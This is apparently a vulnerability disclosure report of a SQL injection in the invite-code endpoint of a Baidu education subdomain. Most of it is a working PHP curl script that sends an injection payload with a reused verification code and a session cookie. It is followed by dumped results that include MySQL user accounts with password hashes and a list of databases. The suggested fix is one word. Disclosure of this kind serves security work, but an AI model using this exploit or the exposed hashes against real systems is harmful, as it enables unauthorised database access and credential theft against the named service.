Baidu second-level domain name root permission Injection Vulnerability
Https://jpaas-edu.baidu.com/the place where the invitation code is entered for this site is injected. Although there is a verification code, the verification code is not refreshed in a session and does not expire in a temporary script:
$querystring = "https://jpaas-edu.baidu.com/xplatfe/invite/api_use_invite_code?invite_code=123' or 1=(1=".$_GET['sql'].") limit 1--+&verify=7kpc"; $cookie_jar='Cookie: sessionid=xxxxxxx';$querystring=str_replace(' ', '%20', $querystring);//print $querystring;$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $querystring);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_COOKIE, $cookie_jar);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);$result=curl_exec($ch);curl_close($ch);print $result;?>Database: mysqlTable: user[6 entries]+--------------+--------+-------------------------------------------+| Host | User | Password |+--------------+--------+-------------------------------------------+| 10.50.139.13 | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B || 10.50.141.55 | edu_rd | *5A0E47C6BA3A218EC7B929CEB437E60772DD89E1 || 127.0.0.1 | admin | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B || 127.0.0.1 | root | *62F991AB07B10BD7A6C95A83E991CB912A136690 || localhost | admin | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B || localhost | root | *62F991AB07B10BD7A6C95A83E991CB912A136690 |+--------------+--------+-------------------------------------------+available databases [6]:[*] baidu_dba[*] edu[*] edu2[*] information_schema[*] mysql[*] test
Solution: Filter